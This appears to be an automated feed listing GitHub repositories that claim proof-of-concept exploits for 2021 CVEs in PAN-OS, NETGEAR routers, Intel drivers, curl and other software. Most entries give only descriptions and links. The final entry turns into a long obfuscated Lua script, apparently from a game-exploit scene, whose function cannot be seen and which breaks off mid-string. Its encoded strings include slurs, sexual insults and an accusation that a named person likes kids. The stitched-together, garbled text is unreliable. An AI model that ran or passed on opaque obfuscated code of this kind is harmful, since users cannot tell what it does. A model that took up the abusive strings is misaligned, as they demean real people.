**PoC for exploiting CVE-2021-33594 : An address bar spoofing vulnerability was discovered in Safe Browser for Android. When user clicks on a specially crafted a malicious URL, it appears like a legitimate one on the address bar, while the content comes from other domain and presented in a window, covering the original content. A remote attacker can leverage this to perform address bar spoofing attack.** : [AlAIAL90/CVE-2021-33594](https://github.com/AlAIAL90/CVE-2021-33594) create time: 2021-08-20T02:31:10Z

**PoC for exploiting CVE-2021-3050 : An OS command injection vulnerability in the Palo Alto Networks PAN-OS web interface enables an authenticated administrator to execute arbitrary OS commands to escalate privileges. This issue impacts: PAN-OS 9.0 version 9.0.10 through PAN-OS 9.0.14; PAN-OS 9.1 version 9.1.4 through PAN-OS 9.1.10; PAN-OS 10.0 version 10.0.7 and earlier PAN-OS 10.0 versions; PAN-OS 10.1 version 10.1.0 through PAN-OS 10.1.1. Prisma Access firewalls and firewalls running PAN-OS 8.1 versions are not impacted by this issue.** : [AlAIAL90/CVE-2021-3050](https://github.com/AlAIAL90/CVE-2021-3050) create time: 2021-08-20T02:31:05Z

**PoC for exploiting CVE-2021-3046 : An improper authentication vulnerability exists in Palo Alto Networks PAN-OS software that enables a SAML authenticated attacker to impersonate any other user in the GlobalProtect Portal and GlobalProtect Gateway when they are configured to use SAML authentication. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.19; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14; PAN-OS 9.1 versions earlier than PAN-OS 9.1.9; PAN-OS 10.0 versions earlier than PAN-OS 10.0.5. PAN-OS 10.1 versions are not impacted.** : [AlAIAL90/CVE-2021-3046](https://github.com/AlAIAL90/CVE-2021-3046) create time: 2021-08-20T02:31:01Z

**PoC for exploiting CVE-2021-38516 : Certain NETGEAR devices are affected by lack of access control at the function level. This affects D6220 before 1.0.0.48, D6400 before 1.0.0.82, D7000v2 before 1.0.0.52, D7800 before 1.0.1.44, D8500 before 1.0.3.43, DC112A before 1.0.0.40, DGN2200v4 before 1.0.0.108, RBK50 before 2.3.0.32, RBR50 before 2.3.0.32, RBS50 before 2.3.0.32, RBK20 before 2.3.0.28, RBR20 before 2.3.0.28, RBS20 before 2.3.0.28, RBK40 before 2.3.0.28, RBR40 before 2.3.0.28, RBS40 before 2.3.0.28, R6020 before 1.0.0.34, R6080 before 1.0.0.34, R6120 before 1.0.0.44, R6220 before 1.1.0.80, R6230 before 1.1.0.80, R6250 before 1.0.4.34, R6260 before 1.1.0.40, R6850 before 1.1.0.40, R6350 before 1.1.0.40, R6400v2 before 1.0.2.62, R6700v3 before 1.0.2.62, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900v2 before 1.2.0.36, R7000 before 1.0.9.34, R6900P before 1.3.1.44, R7000P before 1.3.1.44, R7100LG before 1.0.0.48, R7200 before 1.2.0.48, R7350 before 1.2.0.48, R7400 before 1.2.0.48, R7450 before 1.2.0.36, AC2100 before 1.2.0.36, AC2400 before 1.2.0.36, AC2600 before 1.2.0.36, R7500v2 before 1.0.3.38, R7800 before 1.0.2.58, R7900 before 1.0.3.8, R7960P before 1.4.1.44, R8000 before 1.0.4.28, R7900P before 1.4.1.30, R8000P before 1.4.1.30, R8900 before 1.0.4.2, R9000 before 1.0.4.2, RAX120 before 1.0.0.74, RBK752 before 3.2.16.6, RBR750 before 3.2.16.6, RBS750 before 3.2.16.6, RBK852 before 3.2.16.6, RBR850 before 3.2.16.6, RBS850 before 3.2.16.6, WNR3500Lv2 before 1.2.0.56, XR450 before 2.3.2.32, and XR500 before 2.3.2.32.** : [AlAIAL90/CVE-2021-38516](https://github.com/AlAIAL90/CVE-2021-38516) create time: 2021-08-20T02:30:49Z

**PoC for exploiting CVE-2021-38514 : Certain NETGEAR devices are affected by authentication bypass. This affects D3600 before 1.0.0.72, D6000 before 1.0.0.72, D6100 before 1.0.0.63, D6200 before 1.1.00.34, D6220 before 1.0.0.48, D6400 before 1.0.0.86, D7000 before 1.0.1.70, D7000v2 before 1.0.0.52, D7800 before 1.0.1.56, D8500 before 1.0.3.44, DC112A before 1.0.0.42, DGN2200v4 before 1.0.0.108, DGND2200Bv4 before 1.0.0.108, EX2700 before 1.0.1.48, EX3700 before 1.0.0.76, EX3800 before 1.0.0.76, EX6000 before 1.0.0.38, EX6100 before 1.0.2.24, EX6100v2 before 1.0.1.76, EX6120 before 1.0.0.42, EX6130 before 1.0.0.28, EX6150v1 before 1.0.0.42, EX6150v2 before 1.0.1.76, EX6200 before 1.0.3.88, EX6200v2 before 1.0.1.72, EX6400 before 1.0.2.136, EX7000 before 1.0.0.66, EX7300 before 1.0.2.136, EX8000 before 1.0.1.180, RBK50 before 2.1.4.10, RBR50 before 2.1.4.10, RBS50 before 2.1.4.10, RBK40 before 2.1.4.10, RBR40 before 2.1.4.10, RBS40 before 2.1.4.10, RBW30 before 2.2.1.204, PR2000 before 1.0.0.28, R6020 before 1.0.0.38, R6080 before 1.0.0.38, R6050 before 1.0.1.18, JR6150 before 1.0.1.18, R6120 before 1.0.0.46, R6220 before 1.1.0.86, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.62, R6700 before 1.0.1.48, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900v2 before 1.2.0.36, R6900 before 1.0.1.48, R7000 before 1.0.9.34, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.48, R7300DST before 1.0.0.70, R7500v2 before 1.0.3.38, R7800 before 1.0.2.52, R7900 before 1.0.3.8, R8000 before 1.0.4.28, R7900P before 1.4.1.30, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, R9000 before 1.0.3.10, RBS40V before 2.2.0.58, RBK50V before 2.2.0.58, WN2000RPTv3 before 1.0.1.32, WN2500RPv2 before 1.0.1.54, WN3000RPv3 before 1.0.2.78, WN3100RPv2 before 1.0.0.66, WNDR3400v3 before 1.0.1.22, WNDR3700v4 before 1.0.2.102, WNDR4300v1 before 1.0.2.104, WNDR4300v2 before 1.0.0.56, WNDR4500v3 before 1.0.0.56, WNR2000v5 (R2000) before 1.0.0.66, WNR2020 before 1.1.0.62, WNR2050 before 1.1.0.62, WNR3500Lv2 before 1.2.0.62, and XR500 before 2.3.2.22.** : [AlAIAL90/CVE-2021-38514](https://github.com/AlAIAL90/CVE-2021-38514) create time: 2021-08-20T02:30:45Z

**PoC for exploiting CVE-2021-22098 : UAA server versions prior to 75.4.0 are vulnerable to an open redirect vulnerability. A malicious user can exploit the open redirect vulnerability by social engineering leading to take over of victims’ accounts in certain cases along with redirection of UAA users to a malicious sites.** : [AlAIAL90/CVE-2021-22098](https://github.com/AlAIAL90/CVE-2021-22098) create time: 2021-08-20T02:30:41Z

**PoC for exploiting CVE-2021-23420 : This affects the package codeception/codeception from 4.0.0 and before 4.1.22, before 3.1.3. The RunProcess class can be leveraged as a gadget to run arbitrary commands on a system that is deserializing user input without validation.** : [AlAIAL90/CVE-2021-23420](https://github.com/AlAIAL90/CVE-2021-23420) create time: 2021-08-20T02:30:38Z

**PoC for exploiting CVE-2021-32931 : An uninitialized pointer in FATEK Automation FvDesigner, Versions 1.5.88 and prior may be exploited while the application is processing project files, allowing an attacker to craft a special project file that may permit arbitrary code execution.** : [AlAIAL90/CVE-2021-32931](https://github.com/AlAIAL90/CVE-2021-32931) create time: 2021-08-20T02:30:34Z

**PoC for exploiting CVE-2021-0062 : Improper input validation in some Intel(R) Graphics Drivers before version 27.20.100.8935 may allow an authenticated user to potentially enable escalation of privilege via local access.** : [AlAIAL90/CVE-2021-0062](https://github.com/AlAIAL90/CVE-2021-0062) create time: 2021-08-20T02:30:30Z

**PoC for exploiting CVE-2021-38085 : The Canon TR150 print driver through 3.71.2.10 is vulnerable to a privilege escalation issue. During the add printer process, a local attacker can overwrite CNMurGE.dll and, if timed properly, the overwritten DLL will be loaded into a SYSTEM process resulting in escalation of privileges. This occurs because the driver drops a world-writable DLL into a CanonBJ %PROGRAMDATA% location that gets loaded by printisolationhost (a system process).** : [AlAIAL90/CVE-2021-38085](https://github.com/AlAIAL90/CVE-2021-38085) create time: 2021-08-20T02:30:26Z

**PoC for exploiting CVE-2021-37694 : @asyncapi/java-spring-cloud-stream-template generates a Spring Cloud Stream (SCSt) microservice. In versions prior to 0.7.0 arbitrary code injection was possible when an attacker controls the AsyncAPI document. An example is provided in GHSA-xj6r-2jpm-qvxp. There are no mitigations available and all users are advised to update.** : [AlAIAL90/CVE-2021-37694](https://github.com/AlAIAL90/CVE-2021-37694) create time: 2021-08-20T02:30:22Z

**PoC for exploiting CVE-2021-3047 : A cryptographically weak pseudo-random number generator (PRNG) is used during authentication to the Palo Alto Networks PAN-OS web interface. This enables an authenticated attacker, with the capability to observe their own authentication secrets over a long duration on the PAN-OS appliance, to impersonate another authenticated web interface administrator's session. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.19; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14; PAN-OS 9.1 versions earlier than PAN-OS 9.1.10; PAN-OS 10.0 versions earlier than PAN-OS 10.0.4. PAN-OS 10.1 versions are not impacted.** : [AlAIAL90/CVE-2021-3047](https://github.com/AlAIAL90/CVE-2021-3047) create time: 2021-08-20T02:30:17Z

**PoC for exploiting CVE-2021-3048 : Certain invalid URL entries contained in an External Dynamic List (EDL) cause the Device Server daemon (devsrvr) to stop responding. This condition causes subsequent commits on the firewall to fail and prevents administrators from performing commits and configuration changes even though the firewall remains otherwise functional. If the firewall then restarts, it results in a denial-of-service (DoS) condition and the firewall stops processing traffic. This issue impacts: PAN-OS 9.0 versions earlier than PAN-OS 9.0.14; PAN-OS 9.1 versions earlier than PAN-OS 9.1.9; PAN-OS 10.0 versions earlier than PAN-OS 10.0.5. PAN-OS 8.1 and PAN-OS 10.1 versions are not impacted.** : [AlAIAL90/CVE-2021-3048](https://github.com/AlAIAL90/CVE-2021-3048) create time: 2021-08-20T02:30:13Z

**PoC for exploiting CVE-2021-0061 : Improper initialization in some Intel(R) Graphics Driver before version 27.20.100.9030 may allow an authenticated user to potentially enable escalation of privilege via local access.** : [AlAIAL90/CVE-2021-0061](https://github.com/AlAIAL90/CVE-2021-0061) create time: 2021-08-20T02:30:09Z

**PoC for exploiting CVE-2021-0012 : Use after free in some Intel(R) Graphics Driver before version 27.20.100.8336, 15.45.33.5164, and 15.40.47.5166 may allow an authenticated user to potentially enable denial of service via local access.** : [AlAIAL90/CVE-2021-0012](https://github.com/AlAIAL90/CVE-2021-0012) create time: 2021-08-20T02:30:05Z

**PoC for exploiting CVE-2021-0009 : Out-of-bounds read in the firmware for Intel(R) Ethernet Adapters 800 Series Controllers and associated adapters before version 1.5.3.0 may allow an unauthenticated user to potentially enable denial of service via adjacent access.** : [AlAIAL90/CVE-2021-0009](https://github.com/AlAIAL90/CVE-2021-0009) create time: 2021-08-20T02:30:00Z

**PoC for exploiting CVE-2021-0008 : Uncontrolled resource consumption in firmware for Intel(R) Ethernet Adapters 800 Series Controllers and associated adapters before version 1.5.3.0 may allow privileged user to potentially enable denial of service via local access.** : [AlAIAL90/CVE-2021-0008](https://github.com/AlAIAL90/CVE-2021-0008) create time: 2021-08-20T02:29:56Z

**PoC for exploiting CVE-2021-0006 : Improper conditions check in firmware for Intel(R) Ethernet Adapters 800 Series Controllers and associated adapters before version 1.5.4.0 may allow a privileged user to potentially enable denial of service via local access.** : [AlAIAL90/CVE-2021-0006](https://github.com/AlAIAL90/CVE-2021-0006) create time: 2021-08-20T02:29:52Z

**PoC for exploiting CVE-2021-0007 : Uncaught exception in firmware for Intel(R) Ethernet Adapters 800 Series Controllers and associated adapters before version 1.5.1.0 may allow a privileged attacker to potentially enable denial of service via local access.** : [AlAIAL90/CVE-2021-0007](https://github.com/AlAIAL90/CVE-2021-0007) create time: 2021-08-20T02:29:47Z

**CVE-2018-19320 LPE Exploit** : [hmsec/CVE-2018-19320-LPE](https://github.com/hmsec/CVE-2018-19320-LPE) create time: 2021-08-19T16:43:52Z

**Cobalt Strike < 4.4 dos CVE-2021-36798** : [M-Kings/CVE-2021-36798](https://github.com/M-Kings/CVE-2021-36798) create time: 2021-08-19T11:26:51Z

**no description** : [artsking/curl-7.64.1_CVE-2020-8285_WithPatch](https://github.com/artsking/curl-7.64.1_CVE-2020-8285_WithPatch) create time: 2021-08-19T06:12:20Z

**no description** : [artsking/curl-7.64.1_CVE-2020-8286_WithPatch](https://github.com/artsking/curl-7.64.1_CVE-2020-8286_WithPatch) create time: 2021-08-19T03:26:52Z

**Documentation for cve-2021-39281** : [grahamhelton/CVE-2021-39281](https://github.com/grahamhelton/CVE-2021-39281) create time: 2021-08-18T17:49:20Z

**no description** : [evildrummer/CVE-2021-XYZ2](https://github.com/evildrummer/CVE-2021-XYZ2) create time: 2021-08-18T20:26:01Z

**no description** : [evildrummer/CVE-2021-XYZ](https://github.com/evildrummer/CVE-2021-XYZ) create time: 2021-08-18T19:50:33Z

**CVE-TBD Stored XSS in TastyIgniter v3.0.7 Restaurtant CMS** : [Fearless523/CVE-2021-39287-Stored-XSS](https://github.com/Fearless523/CVE-2021-39287-Stored-XSS) create time: 2021-08-17T03:01:38Z

**no description** : [artsking/curl-7.64.1_CVE-2020-8285_WithPatch](https://github.com/artsking/curl-7.64.1_CVE-2020-8285_WithPatch) create time: 2021-08-18T13:26:01Z

**[CVE-2021-22123] Fortinet FortiWeb Authenticated OS Command Injection** : [murataydemir/CVE-2021-22123](https://github.com/murataydemir/CVE-2021-22123) create time: 2021-08-18T10:54:27Z

**no description** : [madhans23/curl-curl-7_64_1_CVE-2020-8169_withPatch](https://github.com/madhans23/curl-curl-7_64_1_CVE-2020-8169_withPatch) create time: 2021-08-18T10:42:13Z

**no description** : [artsking/curl-7.64.1_CVE-2020-8284_WithPatch](https://github.com/artsking/curl-7.64.1_CVE-2020-8284_WithPatch) create time: 2021-08-18T10:40:48Z

**no description** : [madhans23/curl-curl-7_64_1_CVE-2020-8169_noPatch](https://github.com/madhans23/curl-curl-7_64_1_CVE-2020-8169_noPatch) create time: 2021-08-18T10:27:15Z

**no description** : [madhans23/curl-curl-7_64_1_CVE-2019-5481_withPatch](https://github.com/madhans23/curl-curl-7_64_1_CVE-2019-5481_withPatch) create time: 2021-08-18T09:50:27Z

**no description** : [madhans23/curl-curl-7_64_1_CVE-2019-5481_noPatch](https://github.com/madhans23/curl-curl-7_64_1_CVE-2019-5481_noPatch) create time: 2021-08-18T09:10:51Z

**no description** : [ttestoo/Jetty-CVE-2020-27223](https://github.com/ttestoo/Jetty-CVE-2020-27223) create time: 2021-08-18T07:28:55Z

**Two security issues identified in Sn1per v9.0 free version by XeroSecurity** : [nikip72/CVE-2021-39274-CVE-2021-39274](https://github.com/nikip72/CVE-2021-39274-CVE-2021-39274) create time: 2021-08-17T15:50:48Z

**no description** : [BabyTeam1024/CVE-2016-0638](https://github.com/BabyTeam1024/CVE-2016-0638) create time: 2021-08-17T13:48:58Z

**for n,e in pairs({(function(e,...)_46a6347a9f739a97="This file was obfuscated using PSU Obfuscator 4.5.A | https://www.psu.dev/ & discord.gg/psu";local Y=_46a6347a9f739a97 local j=e[((293569717-#("please suck my cock :pleading:")))];local i=e[((939710819-#("i am not wally stop asking me for wally hub support please fuck off")))];local O=e[(75464704)];local s=e[((762368846-#("When the exploiter is sus")))];local F=e[((457264554-#("[CW] icepools likes kids")))];local q=e[((341291578-#("why does psu.dev attract so many ddosing retards wtf")))];local t=e[(701905122)];local D=e[((#{294;216;375;694;}+430646878))];local B=e[(463178462)];local u=e[(495108270)];local h=e[((453592861-#("cCc cCc cCc cCc CCC 4 4 4 cCc VATAN cCc")))];local T=e[(263166872)];local M=e[((958457376-#("If you see this, congrats you're gay")))];local W=e[(480269586)];local V=e["OrQjp"];local X=e[(895492239)];local Q=e[(321374525)];local H=e['iDrHJlw'];local x=e[(254220684)];local b=e.fjSyrj8tWn;local d=e[((#{974;(function(...)return 207,799,671;end)()}+70077820))];local o=e[(865753153)];local I=e[((824210520-#("Xenvant Likes cock - Perth")))];local U=e.AQkXdpp;local R=e[((781635988-#("Hey reader, you're a sussy baka")))];local w=e['Scn8D'];local a=e.I0CLL2O;local p=e[(57492335)];local P=e[(150106732)];local r=e["U2G9b2ao"];local z=e[((869747004-#("@everyone designs are done. luraph website coming.... eta JULY 2020")))];local ee=e[((#{}+876638582))];local g=e[(567957394)];local L=((getfenv)or(function(...)return(_ENV);end));local l,f,n=({}),(""),(L(t));local c=((n["\98\105"..e[o]..e[j]..e['oMeYI6Vsq']])or(n["\98\105\116"])or({}));local l=(((c)and(c[""..e[i]..e[P].."\111"..e[p]]))or(function(e,l)local n,o=t,r;while((e>r)and(l>r))do local c,t=e%a,l%a;if c~=t then o=o+n;end;e,l,n=(e-c)/a,(l-t)/a,n*a;end;if e<l then e=l;end;while e>r do local l=e%a;if l>r then o=o+n;end;e,n=(e-l)/a,n*a;end;return(o);end));local C=(a^I);local m=(C-t);local k,_,E;local s=(f[""..e[s]..e[x].."\117\98"]);local C=(f[""..e[i]..e['i6WXc']..e[o].."\101"]);local K=(f["\99"..e[g].."\97\114"]);local s=(f[""..e[x]..e['zVFL6R']..e[i]]);local f=((n["\117\110\112"..e[u]..e[F].."\107"])or(n["\116\97"..e[i].."\108\101"]["\117\110\112\97\99\107"]));local y=(n["\116"..e[h].."\110\117"..e[w].."\98"..e[d]..e[p]]);local S=(n[""..e[b].."\99\97\108\108"]);local v=(n[""..e[x]..e[o].."\114\105\110\103"][""..e[w]..e[u].."\116"..e[F].."\104"]);local Z=(n["\115"..e[d]..e[o].."\109"..e[d]..e[o].."\97\116\97\98"..e[B]..e[d]]);local w=(n[""..e[w]..e[u]..e[o]..e[g]]["\102\108"..e[h].."\111"..e[p]]);local G=((n["\109"..e[u].."\116\104"]["\108\100\101"..e[P].."\112"])or(function(e,n,...)return((e*a)^n);end));local P=(n["\116"..e["i6WXc"]..e[b].."\101"]);local P=(n[""..e[x]..e[d]..e[B]..e[d].."\99"..e[o]]);local N=(n["\114\97\119\115\101"..e[o]]);local N=(n[""..e[b]..e[u]..e[D]..e[p].."\115"]);local J=function(l,n,e)return e+n or l*e end;local b=(c[""..e[i]..e['jHcykE9w']..e[h].."\116"])or(function(e,...)return(m-e);end);k=((c["\108\115\104\105"..e[T]..e[o]])or(function(n,e,...)if(e<r)then return(_(n,-(e)));end;return((n*a^e)%a^I);end));local m=(c["\98"..e[h].."\114"])or(function(n,e,...)return(m-E(m-n,m-e));end);E=(c["\98"..e[u].."\110"..e.UE90U])or(function(n,e,...)return(((n+e)-l(n,e))/a);end);_=((c[""..e[p].."\115"..e[g]..e[D].."\102"..e[o]])or(function(n,e,...)if(e<r)then return(k(n,-(e)));end;return(w(n%a^I/a^e));end));if((not(n[""..e[i].."\105\116"..e[j].."\50"]))and(not(n[""..e[i]..e[D]..e[o]])))then c["\98\110\111"..e[o]]=b;c["\98\120"..e[h].."\114"]=l;c[""..e[i].."\111"..e[p]]=m;c["\108"..e[x].."\104\105\102"..e[o]]=k;c[""..e[i].."\97\110"..e["UE90U"]]=E;c["\114\115\104\105"..e[T].."\116"]=_;end;local a=(n[""..e[o].."\97"..e[i]..e[B].."\101"]["\105\110"..e[x]..e[d].."\114"..e[o]]);local x=""..e[U]..e[ee]..e[q].."\100"..e.Yt1hfpp8..e[O]..e[U];local p=(n[""..e[o]..e[u].."\98"..e[B].."\101"][""..e[F].."\111"..e["jHcykE9w"].."\99"..e[u]..e[o]]);local a=(n["\116\97"..e[i]..e[B].."\101"]["\114"..e[d].."\109"..e[h].."\118"..e[d]]);local m=(((n[""..e[o]..e[u]..e[i].."\108"..e[d]]["\99\114"..e[d]..e[u]..e[o].."\101"]))or((function(e,...)return({f({},r,e);});end)));n["\98"..e[D]..e[o].."\51"..e["oMeYI6Vsq"]]=c;local n=((-X+(function()local c,n=r,t;(function(e,n,o,l)n(l(e,l,o,e),l(n,e,n,l),n(n,e,e,e),e(l,o,n and e,o))end)(function(l,o,e,a)if c>Q then return a end c=c+t n=(n*z)%M if(n%W)<V then return l(e(l,e,l,e),e(e,a,e,a),e(o,l,o,o),l(e,e,e and o,o))else return l end return a end,function(l,e,o,a)if c>H then return e end c=c+t n=(n-R)%((43651-#("Perth Was here impossible ikr")))if(n%(1336))<=((692-#("[CW] icepools likes kids")))then n=(n-((#{869;693;943;(function(...)return 945,...;end)(895,953)}+180)))%((7488-#("when the constants are sus")))return o else return e(l(e,e and a,l,l),a(e,e,e,e)and l(o,e,e,e),e(l,o and a,l and e,e),l(l,o,a,l))end return a(a(a and e,a,a,o),a(o,l and l,l and l,o),a(o and l,a,o,e),l(o and l,o,o,o))end,function(l,a,e,o)if c>((#{958;}+232))then return a end c=c+t n=(n-((#{774;438;}+983)))%(26915)if(n%(682))<=(341)then return o else return l(e(e,l,o,e)and a(a,l,a,l),a(l,e,e,o and e),a(e,l,a and l,l),o(e,o,l,l))end return l(a(e,l,o,o),e(l,o and e,o,e),e(e,e,e,o),e(o,a,a,l))end,function(e,o,a,l)if c>((307-#("why does psu.dev attract so many ddosing retards wtf")))then return a end c=c+t n=(n-(161))%((33644-#("this isn't krnl support you bonehead moron")))if(n%(752))<=((455-#("Are you using AztupBrew, clvbrew, or IB2? Congratulations! You're deobfuscated!")))then n=(n*(278))%((#{}+26534))return l else return e(o(e and a,e,a,o),a(l,o,e,l),l(e,l,e,l and o)and e(l,o,o,e),a(e,o,e,l))end return o(l(o,e,l,o),o(e,e and l,a,e),a(e,l,o,e),e(a,l and a,e,o))end)return n;end)()));local o,a=S(function(e)local n,l=e()local o,e=n(e(y),l)local l,n=n(J,r,nil,l)return y(v(n,x))-y(v(e,x))+t end,function(e)if e then return function(e)return e()end else return S,''end end) SrWIOfMWjmkWzUswBkuYS_CmHjFPQcy={"27u32LN1k320V328232LN2NQ27T1C328631352vD32L932g931HI32DY102152141D32152It1x1w32Mm27V27t1h1G2Yw278323F320v22s22s32bl2fZ321y27t2aC2hS321Y27723N32lC25z32Li2IY26K32Ay1031ot1432lM2Kc1N2ho27a2A732Lt2Ac32lW32L71621Y21Y32bl2hO320f32LJ31zs329i32m82HO246246268268321J31zS21l21L32m431Zy323H32M82Ac325z21t21T323y3209172GQ31Ze2ac32ON27632Mp2qE32IL31oP32NY2e332mp31k127727431Zs32Of32nL32nn14328y32Lt32p6328Q32P927A14328i32Pc27a2lO313531Zy32G132oG325z1532FO3135320423H23h326L2nW326P22r22r326S24o24o32Ce22c22C327021w21W32741Y1Y327823L23l32HA1e22b22B327g22z22z327K22I22i327o26626632l41531sH32Os1W2Ho32G1325Z31zl31zS326N32oD1523923932nx28w276321O32p3323I32P532pD32p81K32pa25032PG32pE24a32RI328E32PC27T23K23k32o91432p42BA32p632re32rg32nQ2H627D2102112qE27a326b32ry317732nC329d32S31432s51K2qe325z31771H24523m1621321227J2Km312Z32nh320432RT2qd31771625n25N32LT2QE317721D21D323y2T021821832BL31LB2Cd32s12lQ1o1O229229319g2LQ24D24D24H24H32tg192582582b7319G2qe32pV27632CX216316210320L3204323932m4320922H22H32bl31lk32r8310c2H027T3","PSU|1311102762772781414276112752782112101027E2761o1p27I2781K1l27J2761C1C121226J26J27621S21X1527622b21N17101r1B2311I28321K1a1L1h171D1E1J1m21g21o1D1l1I191t1V25V25627B1022821d1L1S2702491d2762262171H131o1T1P2122181j1p1e1n22H2191627622R1h1B19141r26Z2471327622121M21E24p26Z1J27622v121h2172171S1q1N141521n21I1d111B1Q1T1t1D22a22q22127622w1S1014132211l1022L28K22H2211e1T1S1T1N1N161M1N1h1C111Q29o1q22i22527U21u23G1R1929f1j23114171P2Bm2aa1E28E101L121822s21U1c181721t2bm2bO1p17131322q21U1p1K23b1r2941021u217171a15131E191w21f1j2aI23j21726q25921C26c22q1624F21622V2cl2391r1u121T1R1H161n21721K1i1S2562611a27622a2131R21p21i2aB1v1a161F23029l10220219141D1o1s1N2392Dq102A41H1q1B141J1N1M1724n25x2e32EF2dI1226R24c1827621y21B15192142141M1r25D24H2eW102392B92B81D191L24t25K27821S2672671021Y2e32371m1628g1R21a2261E2DR21j1B1a111n1x21i1H101t17191k25p2542e329N2aB28F21c22928W23b1M1J1S25s2552861022E21F2Di1r1t21s1721h2781021022S1L2282821022c21p1T1O1925O24U2Gq22C21D1T1C21I2191n23D1528W22F21e191823628G2Dr2gt131b29V23o2682F82FA2ba1","141Z2292p22Z91S112942aH2dD28s1l2Fc162382tN2v92vo1121n2192RT2di22n2102nT1023b152GV1h21M21O1f151P1I28I28K1R23a2oQ21T1Y2Q51V1N28f11312b27125u22B22823622z22x22F26D2cl21v21I2862Pv1Q2sJ31241j23b2hv1022X172c62Jy12152d92762311C1A1E21M214313M1t1l2cs191Q2Mf29m31171D21M314J1O2NQ151D2I71H2522PI1021x2171f315A1123w26b2Tn2RI21J2171115182BA2eI3121314S2xp2ba161U2332h62K02K221N2H527628Y1f2KM21l25s2v12761w23q2152Lj27622E14112yt25o24K2Cl2271621O16316c21K1S1522Y2Ak1723Y24n2It2ey2cp1y311U1117316131631826O2Je2762361N311o2OW1n2xk28w22621B2c523x26I1227622n1O1I22E2v12372di24Q22h23g24121V23M22k26B21v1K2Gi2lu1F311V25o24S316F2122m51524X2652H027626Q24q2672441J21e25U1F25S25z315y29M1H1j2qs1R2Ba2Ej1N22S312q27622S317m1n1I2612GP2A32a52Di1B1o24l2op27623b1i171H1s2c51e1H26524T28w31512902142uN2762r42E62302qe2OI2122C52182192271z2f82Z92G62g81k1P316E2ex21g2xN1822621p1M319e2Gf313O2182fQ2Em1n21m21l2Q31d2Q52J225S28v276315s2NM21K22A2Gq2uU2of1122t319n2wa2t72kl2682Jx29m2qN162t62nO315m1V1j21c316J1021w1X311k1D2182232TN2Hg2hi2VR2KR2633","1Bm2h721n10131j310K2pj2O81n1y2Ok25z2512tn2342DE2dG2Di2DK2dM23l26r1r27631ce131731ay1O31612Fe2132161A31A51821A2PL1l21d2cW2aI1724g264313j31A32cp2Q1315J1D1Q1g1c1t2f42Qv28321n2oU2lH316V10319P1627U29B2f0318t2H629n29p142Li2Oq2Up1J2Wc2Bb1n24A26J2V122T1m1326C2r227622t2m32AK22S1i28w31CL1C24C31f031122Kl25M2Ku29W2131q1Y21j2zu1G263319U2Or316M1T18181425a2T32s521n22F1O22N1h22J2mg132492hE3112311421p31A51l23t2yL31AN2c5311x2G52g72g922t2ob2L22152mp2lq21122b2a22KZ171R21D31BB2b92NP31Bf31bh31BJ1125J318u27623831592Ct22S1F2IT23631h131h331BC31h621f2cH21722v22B23o22T27223S1422a24431at2Nu2pd2Pf1u22U2MW2V927L141E311x2AB2Ek22h2K8316w31fq1p1G25225y2h62842fD1023O2uC2832n52M31B2152Ok2562ps2361J2MP1b1221921V2V121y191p21O2LS27622Q294131622O2eD22u318R2El1q2Ct2Vd1J313829521N2NN2NP2cV2pN1222S2ho2o5141l24c319d102yy2z021o2oE2eA24H31Im2762SP2b923x26l316f21d141c1u24b31IS103140102B9102b52ME3159312l1a2AB22p2yx21l1K21e2G431Aw2G92362s42E42131V2Bz1n21C2cO23331am1021v1531B22c525o2F731De21d171J2mR31BK24u2mG2ey151o1H1n2QG1Y315t315v26","O293316K21R2Kk2KM2Ko2rl25231DZ319V2dH28k1Q182Io2I8315A21131Ah2EE31ej1826P24E2Ed2yY1821G2Yt1f31L2312L31HN31Be311629423o2O42kZ317V311P172z62Tn22E21R1r2J21k1d21l2Vk22S1s2ed2j82VE31c62L81o1J22s2it2vg31JV2G221I311o1g31C42Oa2e331CE171g1R1Q1c23g2V12w31B25P24g2Oq23b29A1P1o131h12162112J62762242112uG2b52G81o2Q82IM1L2lG31m32UX1s1331N42MH2132qf2G821D31Ii1G2Vu2V122a21F1O26L317S31Ll31Ds10310c22721B2gJ2Rx1T24n2R92lU31H82Ms2gO2Gq2GS2Gu2ng22h316822P31fZ2Vd1R22Q1U2Kv2a531PT31KM1u26f2EV2L22l42L62L81D2532662cL22R315f21M2Hl2902mB1625231Q12cM2s71t21Q21q2s824F26p25u25z28W2382fD1L26324T31GZ2Z92A72A92zB2AE2AG2Ai2AK1D24Q2652iT2Ri21c1x1M2ob2fz15316m172622542p231JL311v2e0310a2RT111h2ZA2Gv21E2812762ki1D2172192GB2P22ef312z31311b31331v31352L921f22624921v1X22h23121222a25x2312gQ22i21H121f1B1C1m2xo23c2aq2AS2AU2AW102Zt31e631E81m2222bJ1221U2262N121Y22g31A431do2At1o22K1n2L71227427v2zc2bD31JH15161B1E1p1n22A2142jj22U1622z22W23h1521021223G2381j21k1O21M21222K23i2101W2151I21D21c1j22K22m1121O23B22722e22K28h1422922H2S82261222H1V","21n23H23521j2111m21i21A2141z21321q23C22f1122a1122R1t21c26k23N2m32FM1z27d2xM1D2aE1I313d2b72102Gz2qf1b1N31Sg2Oo2Oq22f2AF1721k1z2ax1121021Z2w22a52Wc319Y1923f31rg1t2T023n26f313J2u33109310B11317k2SV1726824a2It2j82pM2PO1G31Ug2nq31iJ1m2122251O28321M1427l28o2ms21o21F315L1S1621R2YZ2wD1931Aq23w31Kj312L31oR1M2n831JD102382KK1g1f31tb2OI21h2eK2nY2AM21627527D2h021121331862781U31pA31Sg2p21Y1Z1331j52192762n711132452452761y1W16141I28B1031zQ171524i24I31zp1w141625E25e3202151725X25x32022t03177320229p25F25F3202181A2442443202191B24N24N32021e1c23323332022vD21h2gz31Zw1w1C1E22n22N32022Qo26126132021I1g22x22X32021J1h24l24l32021G31fC28W31zQ319f23p23P32021m1K1a2ED31zq314423v23V32021k1m2492493202313525425432021Q1O320I32022N722o22O32021O1q22P22p32021p1R24Q24q320231Za26c26c32022ny22822832022VY26g26G320228s23y23y320231zq2I832021z1X25c25c32021w1Y31R